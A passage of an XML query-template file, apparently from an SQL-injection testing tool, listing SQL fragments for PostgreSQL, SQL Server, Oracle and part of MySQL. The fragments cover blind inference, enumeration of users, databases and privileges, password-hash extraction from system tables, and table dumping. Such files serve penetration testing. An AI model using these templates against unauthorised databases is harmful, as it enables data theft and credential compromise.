table_schema='%s'\" count=\"SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'\" condition=\"column_name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" query2=\"SELECT db FROM mysql.db WHERE %s\" condition=\"schema_name\" condition2=\"db\"/>\n            <blind query=\"SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" query2=\"SELECT DISTINCT(db) FROM mysql.db WHERE %s\" count=\"SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s\" count2=\"SELECT COUNT(DISTINCT(db)) FROM mysql.db WHERE %s\" condition=\"schema_name\" condition2=\"db\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s\" condition=\"table_name\" condition2=\"table_schema\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'\" condition=\"table_name\" condition2=\"table_schema\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n            <blind query=\"SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" query2=\"SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" count=\"SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'\" condition=\"column_name\" condition2=\"table_schema\" condition3=\"table_name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"PostgreSQL\">\n        <cast query=\"CAST(%s AS VARCHAR(10000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <!-- NOTE: PostgreSQL does not like COALESCE with different data-types (e.g. COALESCE(id,' ')) -->\n        <isnull query=\"COALESCE(%s::text,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"OFFSET %d LIMIT %d\"/>\n        <limitregexp query=\"\\s+OFFSET\\s+([\\d]+)\\s+LIMIT\\s+([\\d]+)\" query2=\"\\s+LIMIT\\s+([\\d]+)\"/>\n        <limitgroupstart query=\"1\"/>\n        <limitgroupstop query=\"2\"/>\n        <limitstring query=\" OFFSET \"/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\"/>\n        <substring query=\"SUBSTRING((%s)::text FROM %d FOR %d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <hex query=\"ENCODE(CONVERT_TO((%s),'UTF8'),'HEX')\"/>\n        <inference query=\"ASCII(SUBSTRING((%s)::text FROM %d FOR 1))>%d\"/>\n        <banner query=\"VERSION()\"/>\n        <current_user query=\"CURRENT_USER\"/>\n        <current_db query=\"CURRENT_SCHEMA()\"/>\n        <hostname/>\n        <!--<table_comment query=\"SELECT pg_catalog.obj_description(c.oid) FROM pg_catalog.pg_class c WHERE c.relname='%s'\"/>-->\n        <table_comment query=\"SELECT description FROM pg_description JOIN pg_class ON pg_description.objoid=pg_class.oid JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid WHERE nspname='%s' AND relname='%s'\"/>\n        <column_comment query=\"SELECT col_description(pg_class.oid,pg_attribute.attnum) FROM pg_class JOIN pg_namespace ON pg_class.relnamespace=pg_namespace.oid JOIN pg_attribute ON pg_class.oid=pg_attribute.attrelid WHERE nspname='%s' AND relname='%s' AND attname='%s'\"/>\n        <is_dba query=\"(SELECT usesuper=true FROM pg_user WHERE usename=CURRENT_USER OFFSET 0 LIMIT 1)\"/>\n        <check_udf query=\"(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)\"/>\n        <users>\n            <inband query=\"SELECT usename FROM pg_user\"/>\n            <blind query=\"SELECT DISTINCT(usename) FROM pg_user ORDER BY usename OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(usename)) FROM pg_user\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT usename,passwd FROM pg_shadow\" condition=\"usename\"/>\n            <blind query=\"SELECT DISTINCT(passwd) FROM pg_shadow WHERE usename='%s' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(passwd)) FROM pg_shadow WHERE usename='%s'\"/>\n        </passwords>\n        <privileges>\n            <inband query=\"SELECT usename,(CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user\" condition=\"usename\"/>\n            <blind query=\"SELECT (CASE WHEN usecreatedb THEN 1 ELSE 0 END),(CASE WHEN usesuper THEN 1 ELSE 0 END),(CASE WHEN usecatupd THEN 1 ELSE 0 END) FROM pg_user WHERE usename='%s' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(usename)) FROM pg_user WHERE usename='%s'\"/>\n        </privileges>\n        <roles/>\n        <statements>\n            <inband query=\"SELECT query FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'\"/>\n            <blind query=\"SELECT DISTINCT(query) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;' OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(query)) FROM pg_stat_activity WHERE query != '&lt;IDLE&gt;'\"/>\n        </statements>\n        <dbs>\n            <inband query=\"SELECT DISTINCT(schemaname) FROM pg_tables\"/>\n            <blind query=\"SELECT DISTINCT(schemaname) FROM pg_tables ORDER BY schemaname OFFSET %d LIMIT 1\" count=\"SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT schemaname,tablename FROM pg_tables\" condition=\"schemaname\" query2=\"SELECT table_schema,table_name FROM information_schema.tables\" condition2=\"table_schema\"/>\n            <blind query=\"SELECT tablename FROM pg_tables WHERE schemaname='%s' ORDER BY tablename OFFSET %d LIMIT 1\" count=\"SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'\" query2=\"SELECT table_name FROM information_schema.tables WHERE table_schema='%s' OFFSET %d LIMIT 1\" count2=\"SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT attname,typname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s' ORDER BY attname\" condition=\"attname\"/>\n            <blind query=\"SELECT attname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s' ORDER BY attname\" query2=\"SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s' ORDER BY attname\" count=\"SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'\" condition=\"attname\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s ORDER BY %s\"/>\n            <blind query=\"SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1\" count=\"SELECT COUNT(*) FROM %s.%s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT schemaname FROM pg_tables WHERE %s\" condition=\"schemaname\"/>\n            <blind query=\"SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s\" count=\"SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s\" condition=\"schemaname\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT schemaname,tablename FROM pg_tables WHERE %s\" condition=\"tablename\" condition2=\"schemaname\"/>\n            <blind query=\"SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s\" query2=\"SELECT tablename FROM pg_tables WHERE schemaname='%s'\" count=\"SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s\" count2=\"SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'\" condition=\"tablename\" condition2=\"schemaname\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT nspname,relname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s\" condition=\"attname\" condition2=\"nspname\" condition3=\"relname\"/>\n            <blind query=\"SELECT DISTINCT(nspname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s\" query2=\"SELECT DISTINCT(relname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'\" count=\"SELECT COUNT(DISTINCT(nspname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s\" count2=\"SELECT COUNT(DISTINCT(relname)) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND nspname='%s'\" condition=\"attname\" condition2=\"nspname\" condition3=\"relname\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Microsoft SQL Server\">\n        <cast query=\"CAST(%s AS NVARCHAR(4000))\"/>\n        <length query=\"LTRIM(STR(LEN(%s)))\"/>\n        <isnull query=\"ISNULL(%s,' ')\"/>\n        <delimiter query=\"+\"/>\n        <limit query=\"SELECT TOP %d \"/>\n        <limitregexp query=\"TOP\\s+([\\d]+)\\s+.+?\\s+FROM\\s+.+?\\s+WHERE\\s+.+?\\s+NOT\\s+IN\\s+\\(SELECT\\s+TOP\\s+([\\d]+)\\s+\"/>\n        <limitgroupstart query=\"2\"/>\n        <limitgroupstop query=\"1\"/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\" query2=\"/*\"/>\n        <substring query=\"SUBSTRING((%s),%d,%d)\"/>\n        <concatenate query=\"%s+%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)\"/>\n        <hex query=\"master.dbo.fn_varbintohexstr(CAST(%s AS VARBINARY(8000)))\"/>\n        <inference query=\"UNICODE(SUBSTRING((%s),%d,1))>%d\"/>\n        <banner query=\"SELECT @@VERSION\"/>\n        <current_user query=\"SELECT SYSTEM_USER\"/>\n        <current_db query=\"SELECT DB_NAME()\"/>\n        <hostname query=\"@@SERVERNAME\"/>\n        <table_comment query=\"SELECT value FROM fn_listextendedproperty(NULL,'schema','%s','table','%s',NULL,NULL)\"/>\n        <column_comment query=\"SELECT value FROM fn_listextendedproperty(NULL,'schema','%s','table','%s','column','%s')\"/>\n        <is_dba query=\"IS_SRVROLEMEMBER('sysadmin')=1\" query2=\"IS_SRVROLEMEMBER('sysadmin','%s')=1\"/>\n        <users>\n            <inband query=\"SELECT name FROM master..syslogins\" query2=\"SELECT name FROM sys.sql_logins\"/>\n            <!-- NOTE: in NOT IN kind of queries ORDER BY is a must -->\n            <blind query=\"SELECT TOP 1 name FROM master..syslogins WHERE name NOT IN (SELECT TOP %d name FROM master..syslogins ORDER BY name) ORDER BY name\" query2=\"SELECT TOP 1 name FROM sys.sql_logins WHERE name NOT IN (SELECT TOP %d name FROM sys.sql_logins ORDER BY name) ORDER BY name\" count=\"SELECT LTRIM(STR(COUNT(name))) FROM master..syslogins\" count2=\"SELECT LTRIM(STR(COUNT(name))) FROM sys.sql_logins\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT name,master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins\" query2=\"SELECT name,master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins\" condition=\"name\"/>\n            <blind query=\"SELECT TOP 1 master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins WHERE name='%s' AND password NOT IN (SELECT TOP %d password FROM master..sysxlogins WHERE name='%s' ORDER BY password) ORDER BY password\" query2=\"SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='%s' AND password_hash NOT IN (SELECT TOP %d password_hash FROM sys.sql_logins WHERE name='%s' ORDER BY password_hash) ORDER BY password_hash\" count=\"SELECT LTRIM(STR(COUNT(password))) FROM master..sysxlogins WHERE name='%s'\" count2=\"SELECT LTRIM(STR(COUNT(password_hash))) FROM sys.sql_logins WHERE name='%s'\"/>\n        </passwords>\n        <!-- NOTE: in Microsoft SQL Server there is no query to enumerate DBMS users privileges -->\n        <privileges/>\n        <roles/>\n        <statements>\n            <inband query=\"SELECT st.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st\"/>\n            <blind query=\"SELECT TOP 1 a.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) a WHERE a.text NOT IN (SELECT TOP %d b.text FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) b ORDER BY b.text) ORDER BY a.text\" count=\"SELECT LTRIM(STR(COUNT(st.text))) FROM sys.dm_exec_cached_plans cp CROSS APPLY sys.dm_exec_sql_text(cp.plan_handle) st\"/>\n        </statements>\n        <dbs>\n            <inband query=\"SELECT name FROM master..sysdatabases\" query2=\"SELECT DB_NAME(%d)\"/>\n            <blind query=\"SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP %d name FROM master..sysdatabases ORDER BY name) ORDER BY name\" count=\"SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT %s..sysusers.name+'.'+%s..sysobjects.name AS table_name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v')\" query2=\"SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'\" query3=\"SELECT name FROM %s..sysobjects WHERE xtype='U'\"/>\n            <blind query=\"SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid=%s..sysusers.uid WHERE %s..sysobjects.xtype IN ('u','v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name\" count=\"SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')\" query2=\"SELECT TOP 1 table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' AND table_schema+'.'+table_name NOT IN (SELECT TOP %d table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' ORDER BY table_schema+'.'+table_name) ORDER BY table_schema+'.'+table_name\" count2=\"SELECT LTRIM(STR(COUNT(table_name))) FROM information_schema.tables WHERE table_catalog='%s'\" query3=\"SELECT TOP 1 name FROM %s..sysobjects WHERE xtype='U' AND name NOT IN (SELECT TOP %d name FROM %s..sysobjects WHERE xtype='U' ORDER BY name) ORDER BY name\" count3=\"SELECT COUNT(name) FROM %s..sysobjects WHERE xtype='U'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) AS type_name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'\" query2=\"SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)\" condition=\"[DB]..syscolumns.name\"/>\n            <blind query=\"SELECT TOP 1 %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' AND %s..syscolumns.name NOT IN (SELECT TOP %d %s..syscolumns.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s' ORDER BY %s..syscolumns.name) ORDER BY %s..syscolumns.name\" query2=\"SELECT TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.name='%s' AND %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'\" query3=\"SELECT COL_NAME(OBJECT_ID('%s.%s'),%d)\" count=\"SELECT LTRIM(STR(COUNT(name))) FROM %s..syscolumns WHERE id=(SELECT id FROM %s..sysobjects WHERE name='%s')\" condition=\"[DB]..syscolumns.name\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s.%s\"/>\n            <blind query=\"SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'\" query2=\"SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'\" query3=\"SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d\" count=\"SELECT LTRIM(STR(COUNT(*))) FROM %s\" count2=\"SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s\"/>\n        </dump_table>\n        <search_db>\n            <inband query=\"SELECT name FROM master..sysdatabases WHERE %s\" condition=\"name\"/>\n            <blind query=\"SELECT name FROM master..sysdatabases WHERE %s\" count=\"SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases WHERE %s\" condition=\"name\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT name FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v') AND \" condition=\"name\" condition2=\"name\"/>\n            <blind query=\"SELECT name FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v') \" count=\"SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE %s..sysobjects.xtype IN ('u','v')\" condition=\"name\" condition2=\"name\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')\" condition=\"[DB]..syscolumns.name\" condition2=\"[DB]..sysobjects.name\"/>\n            <blind query=\"SELECT %s..sysobjects.name FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')\" count=\"SELECT COUNT(%s..sysobjects.name) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.xtype IN ('u','v')\" condition=\"[DB]..syscolumns.name\" condition2=\"[DB]..sysobjects.name\"/>\n        </search_column>\n    </dbms>\n\n    <dbms value=\"Oracle\">\n        <cast query=\"CAST(%s AS VARCHAR(4000))\"/>\n        <length query=\"LENGTH(%s)\"/>\n        <isnull query=\"NVL(%s,' ')\"/>\n        <delimiter query=\"||\"/>\n        <limit query=\"ROWNUM AS LIMIT %s) WHERE LIMIT\"/>\n        <limitregexp query=\"ROWNUM\\s+AS\\s+.+?\\s+FROM\\s+.+?\\)\\s+WHERE\\s+.+?\\s*=\\s*[\\d]+|ROWNUM\\s*=\\s*[\\d]+\"/>\n        <limitgroupstart/>\n        <limitgroupstop/>\n        <limitstring/>\n        <order query=\"ORDER BY %s ASC\"/>\n        <count query=\"COUNT(%s)\"/>\n        <comment query=\"--\"/>\n        <substring query=\"SUBSTRC((%s),%d,%d)\"/>\n        <concatenate query=\"%s||%s\"/>\n        <case query=\"SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)\"/>\n        <hex query=\"RAWTOHEX(%s)\"/>\n        <!--\n        NOTE: ASCIISTR (https://www.techonthenet.com/oracle/functions/asciistr.php)\n        -->\n        <inference query=\"ASCII(SUBSTRC((%s),%d,1))>%d\"/>\n        <banner query=\"SELECT banner FROM v$version WHERE ROWNUM=1\"/>\n        <current_user query=\"SELECT USER FROM DUAL\"/>\n        <!--\n        NOTE: current physical DB but not usable for enumeration\n        <current_db query=\"SELECT SYS.DATABASE_NAME FROM DUAL\"/>\n        -->\n        <current_db query=\"SELECT USER FROM DUAL\"/>\n        <!--\n             NOTE: in Oracle to check if the session user is DBA you can use:\n             SELECT USERENV('ISDBA') FROM DUAL\n        -->\n        <hostname query=\"SELECT UTL_INADDR.GET_HOST_NAME FROM DUAL\"/>\n        <table_comment query=\"SELECT COMMENTS FROM ALL_TAB_COMMENTS WHERE OWNER='%s' AND TABLE_NAME='%s'\"/>\n        <column_comment query=\"SELECT COMMENTS FROM ALL_COL_COMMENTS WHERE OWNER='%s' AND TABLE_NAME='%s' AND COLUMN_NAME='%s'\"/>\n        <is_dba query=\"(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'\"/>\n        <users>\n            <inband query=\"SELECT USERNAME FROM SYS.ALL_USERS\"/>\n            <blind query=\"SELECT USERNAME FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d\" count=\"SELECT COUNT(USERNAME) FROM SYS.ALL_USERS\"/>\n        </users>\n        <passwords>\n            <inband query=\"SELECT NAME,PASSWORD FROM SYS.USER$\" condition=\"NAME\"/>\n            <blind query=\"SELECT PASSWORD FROM (SELECT PASSWORD,ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d\" count=\"SELECT COUNT(PASSWORD) FROM SYS.USER$ WHERE NAME='%s'\"/>\n        </passwords>\n        <!--\n             NOTE: in Oracle to enumerate the privileges for the session user you can use:\n             SELECT * FROM SESSION_PRIVS\n        -->\n        <privileges>\n            <inband query=\"SELECT GRANTEE,PRIVILEGE FROM DBA_SYS_PRIVS\" query2=\"SELECT USERNAME,PRIVILEGE FROM USER_SYS_PRIVS\" condition=\"GRANTEE\" condition2=\"USERNAME\"/>\n            <blind query=\"SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d\" query2=\"SELECT PRIVILEGE FROM (SELECT PRIVILEGE,ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d\" count=\"SELECT COUNT(PRIVILEGE) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'\" count2=\"SELECT COUNT(PRIVILEGE) FROM USER_SYS_PRIVS WHERE USERNAME='%s'\"/>\n        </privileges>\n        <!--\n             NOTE: in Oracle to enumerate the roles for the session user you can use:\n             SELECT * FROM SESSION_ROLES\n        -->\n        <roles>\n            <inband query=\"SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS\" query2=\"SELECT USERNAME,GRANTED_ROLE FROM USER_ROLE_PRIVS\" condition=\"GRANTEE\" condition2=\"USERNAME\"/>\n            <blind query=\"SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d\" query2=\"SELECT GRANTED_ROLE FROM (SELECT GRANTED_ROLE,ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d\" count=\"SELECT COUNT(GRANTED_ROLE) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'\" count2=\"SELECT COUNT(GRANTED_ROLE) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'\"/>\n        </roles>\n        <statements>\n            <inband query=\"SELECT SQL_TEXT FROM V$SQL\"/>\n            <blind query=\"SELECT SQL_TEXT FROM (SELECT SQL_TEXT,ROWNUM AS LIMIT FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%') WHERE LIMIT=%d\" count=\"SELECT COUNT(SQL_TEXT) FROM V$SQL WHERE SQL_TEXT NOT LIKE '%%SQL_TEXT%%'\"/>\n        </statements>\n        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->\n        <dbs>\n            <inband query=\"SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)\"/>\n            <blind query=\"SELECT OWNER FROM (SELECT OWNER,ROWNUM AS LIMIT FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES)) WHERE LIMIT=%d\" count=\"SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES\"/>\n        </dbs>\n        <tables>\n            <inband query=\"SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES\" condition=\"OWNER\"/>\n            <blind query=\"SELECT TABLE_NAME FROM (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER='%s') WHERE LIMIT=%d\" count=\"SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s'\"/>\n        </tables>\n        <columns>\n            <inband query=\"SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'\" condition=\"COLUMN_NAME\"/>\n            <blind query=\"SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'\" query2=\"SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND OWNER='%s'\" count=\"SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND OWNER='%s'\" condition=\"COLUMN_NAME\"/>\n        </columns>\n        <dump_table>\n            <inband query=\"SELECT %s FROM %s ORDER BY ROWNUM\"/>\n            <blind query=\"SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq ORDER BY ROWNUM) WHERE LIMIT=%d\" count=\"SELECT COUNT(*) FROM %s\"/>\n        </dump_table>\n        <!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->\n        <search_db>\n            <inband query=\"SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE %s\" condition=\"OWNER\"/>\n            <blind query=\"SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) WHERE %s\" count=\"SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE %s\" condition=\"OWNER\"/>\n        </search_db>\n        <search_table>\n            <inband query=\"SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE %s\" condition=\"TABLE_NAME\" condition2=\"OWNER\"/>\n            <blind query=\"SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES WHERE %s)\" query2=\"SELECT TABLE_NAME FROM (SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE OWNER='%s')\" count=\"SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TABLES WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TABLES WHERE OWNER='%s'\" condition=\"TABLE_NAME\" condition2=\"OWNER\"/>\n        </search_table>\n        <search_column>\n            <inband query=\"SELECT OWNER,TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE %s\" condition=\"COLUMN_NAME\" condition2=\"OWNER\" condition3=\"TABLE_NAME\"/>\n            <blind query=\"SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TAB_COLUMNS WHERE %s)\" query2=\"SELECT TABLE_NAME FROM (SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE OWNER='%s')\" count=\"SELECT COUNT(DISTINCT(OWNER)) FROM SYS.ALL_TAB_COLUMNS WHERE %s\" count2=\"SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS WHERE OWNER='%s'\" condition=\"COLUMN_NAME\" 